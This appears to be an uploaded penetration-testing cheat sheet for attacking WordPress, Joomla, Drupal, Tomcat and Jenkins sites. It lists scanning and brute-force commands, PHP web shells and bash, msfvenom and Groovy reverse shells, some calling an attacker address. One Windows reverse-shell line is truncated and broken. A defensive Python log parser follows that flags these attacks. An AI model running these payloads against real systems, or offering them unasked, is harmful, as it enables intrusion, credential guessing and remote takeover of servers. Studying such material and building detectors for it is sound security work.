Attacking Common Applications Module Cheat Sheet

This document is a cheat sheet for attacking common applications, detailing various command-line tools and scripts used for web application security testing. It includes commands for scanning, brute-forcing, and exploiting vulnerabilities in systems like Joomla, Drupal, and Tomcat. The document provides specific syntax and options for each command to facilitate penetration testing efforts.

Uploaded by paratester696

ATTACKING COMMON APPLICATIONS CHEAT SHEET

Command / Description (each entry lists the command first, with its description indented beneath it)

sudo vim /etc/hosts
    Opens /etc/hosts with vim to start adding hostnames.

sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list
    Runs an nmap scan of common web application ports against the hosts in a scope list (-iL scope_list), keeping only hosts with open ports (--open) and writing the output in all formats (-oA) to files named web_discovery.

eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated>
    Runs EyeWitness on the XML output of the nmap scan (web_discovery.xml) and writes its report into the named directory, which it creates (-d).

cat web_discovery.xml | ./aquatone -nmap
    Pipes the nmap XML output (web_discovery.xml) into aquatone (./aquatone); the -nmap flag tells aquatone to parse its input as nmap scan output.

sudo wpscan --url http://domainnameoripaddress --enumerate
    Runs wpscan with the --enumerate flag. The URL can be replaced with any valid and reachable URL in each challenge.

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://domainnameoripaddress
    Runs a wpscan password attack (--password-attack) over XML-RPC against the specified URL for the user john (-U), using 20 threads (-t 20) and the referenced wordlist (-P /usr/share/wordlists/rockyou.txt).

curl -s http://<hostnameoripoftargetsite>/path/to/webshell.php?cmd=id
    cURL command used to execute a command (cmd=id) on a vulnerable system through a PHP-based web shell.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip address of attack box>/<port of choice> 0>&1'");
    PHP code that will execute a reverse shell on a Linux-based system.

droopescan scan joomla --url http://<domainnameoripaddress>
    Runs droopescan against a Joomla site located at the specified URL.
sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr <username or path to username list>
    Runs the joomla-brute.py tool with python3 against the specified URL, using the specified wordlist (-w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt) and a username or list of usernames (-usr).

<?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?>
    PHP code that will allow for web shell access on a vulnerable Drupal site. Can be used by browsing to the location of the file in the web directory after saving it. Can also be leveraged with curl; see the next command.

curl -s http://<domainname or IP address of site>/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id | grep uid | cut -f4 -d">"
    Uses curl to request the PHP web shell file and run a system command (=id) on the target, then trims the response down to the command output.

gobuster dir -u http://<domainnameoripaddressofsite> -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
    gobuster-powered directory brute-forcing attack referencing a wordlist (/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt).

auxiliary/scanner/http/tomcat_mgr_login
    Useful Metasploit scanner module used to perform a brute-force login attack against a Tomcat site.

python3 mgr_brute.py -U http://<domainnameoripaddressofTomCatsite> -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    Runs mgr_brute.py with python3 against the specified website, starting in the /manager directory (-P /manager) and referencing a specified user or user list (-u) as well as a specified password or password list (-p).

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip address of attack box> LPORT=<port to listen on to catch a shell> -f war > backup.war
    Generates a JSP-based reverse shell payload in the form of a .war file using msfvenom.

nmap -sV -p 8009,8080 <domainname or IP address of tomcat site>
    Nmap scan useful for enumerating Apache Tomcat and AJP services.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
    Groovy-based reverse shell payload/code that can work with admin access to the Script Console of a Jenkins site. Will work when the underlying OS is Linux.

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
    Groovy-based payload/code that can work with admin access to the Script Console of a Jenkins site. This will allow web shell access and execution of commands on the underlying Windows system.

String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new So);
    Groovy-based reverse shell payload/code that can work with admin access to the Script Console of a Jenkins site. Will work when the underlying OS is Windows.

reverse_shell_splunk
    A simple Splunk package for obtaining reverse shells on Windows and Linux systems.
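Every command above leaves a recognisable trace in the target's web server access log, which is what a defender monitors for. As an added example that is not part of the cheat sheet, the Python script below parses combined-format access-log lines and flags the patterns these tools produce: a query parameter carrying a shell command (the cmd=id web shell request), an opaque 32-hex-character parameter name (the Drupal web shell), a burst of POSTs to /xmlrpc.php from one address (the wpscan password attack), repeated 401s on the Tomcat manager application (tomcat_mgr_login and mgr_brute.py), and scanner user agents. The log lines, IP addresses, paths, the threshold of 10 requests and the user-agent markers are all constructed assumptions for this example; real deployments should tune them.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Regex for the Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# First tokens that, as a query-string value, look like a command handed to a web shell (assumed list).
SHELL_COMMANDS = {"id", "whoami", "uname", "cat", "ls", "bash", "sh", "nc",
                  "wget", "curl", "dir", "cmd.exe", "powershell"}
# Parameter names that are a long hex blob (the cheat sheet's Drupal shell uses a 32-hex-char name).
HEX_NAME_RE = re.compile(r'^[0-9a-f]{16,}$')
# Substrings of the default User-Agent strings of tools on the cheat sheet (assumption; operators can change them).
SCANNER_UA_MARKERS = ("WPScan", "gobuster", "droopescan")


def parse_line(line):
    """Return the fields of one combined-format log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, auth_threshold=10):
    """Scan access-log text for the request patterns the listed tools leave behind.

    Returns a sorted list of (rule, source_ip, detail) tuples.
    """
    findings = set()
    xmlrpc_posts = Counter()   # POSTs to /xmlrpc.php per source IP (wpscan --password-attack xmlrpc)
    manager_401s = Counter()   # 401 responses on the Tomcat manager app per source IP

    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        ip = rec["ip"]
        url = urlsplit(rec["target"])
        path = url.path

        # Rules 1 and 2: query parameters that carry a shell command or use an opaque hex name.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            first_token = value.strip().split(" ", 1)[0] if value.strip() else ""
            if name == "cmd" or first_token in SHELL_COMMANDS:
                findings.add(("webshell_command", ip, f"{path}?{name}={value}"))
            if HEX_NAME_RE.match(name):
                findings.add(("opaque_hex_param", ip, f"{path}?{name}"))

        # Rule 3: scanner user agents.
        if any(marker in rec["ua"] for marker in SCANNER_UA_MARKERS):
            findings.add(("scanner_user_agent", ip, rec["ua"]))

        # Counters for the volume-based rules (whole log, no time window, to keep the example short).
        if rec["method"] == "POST" and path == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1
        if path.startswith("/manager/") and rec["status"] == "401":
            manager_401s[ip] += 1

    for ip, n in xmlrpc_posts.items():
        if n >= auth_threshold:
            findings.add(("xmlrpc_password_attack", ip, f"{n} POSTs to /xmlrpc.php"))
    for ip, n in manager_401s.items():
        if n >= auth_threshold:
            findings.add(("tomcat_manager_brute_force", ip, f"{n} failed logins on /manager/"))

    return sorted(findings)


def _line(ip, method, target, status, ua):
    """Build one constructed combined-format log line for the sample below."""
    return f'{ip} - - [10/Jan/2024:10:00:00 +0000] "{method} {target} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample log: addresses, paths and user agents are invented for this example.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.7", "GET", "/index.php", 200, "Mozilla/5.0"),
     _line("10.0.0.9", "GET", "/uploads/webshell.php?cmd=id", 200, "curl/7.88.1"),
     _line("10.0.0.9", "GET", "/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id", 200, "curl/7.88.1"),
     _line("10.0.0.10", "GET", "/wp-login.php", 200,
           "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)")]
    + [_line("10.0.0.11", "POST", "/xmlrpc.php", 200, "Mozilla/5.0")] * 12
    + [_line("10.0.0.12", "GET", "/manager/html", 401, "python-requests/2.31")] * 10
)

if __name__ == "__main__":
    for rule, ip, detail in analyze(SAMPLE_LOG):
        print(f"{rule:28} {ip:12} {detail}")
```

The volume rules count over the whole input; in production you would bucket by time window and feed the counters from a log shipper rather than a file, but the per-request rules (command-like parameter values, hex parameter names, tool user agents) transfer unchanged to any WAF or SIEM rule language.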
